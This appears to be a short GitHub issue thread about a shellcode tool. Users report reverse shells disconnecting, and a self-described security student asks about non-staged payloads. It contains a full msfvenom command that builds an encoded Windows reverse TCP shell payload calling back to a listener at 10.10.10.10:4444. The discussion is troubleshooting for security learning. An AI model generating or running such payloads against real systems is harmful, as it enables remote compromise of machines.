Open chppppp opened 5 years ago
I also have the same issue. The payload will deploy and my listener will connect, but instantly disconnect with no shell. I do not know why this happens. @danigargu Is there anyway to create payload with out meterpreter?
Sorry if this is a newb question :D I am a sec student
I am unable to get this to work with a non-staged payload, eg)
msfvenom -p windows/shell_reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.10.10 LPORT=4444 -o shellcode
any suggestions?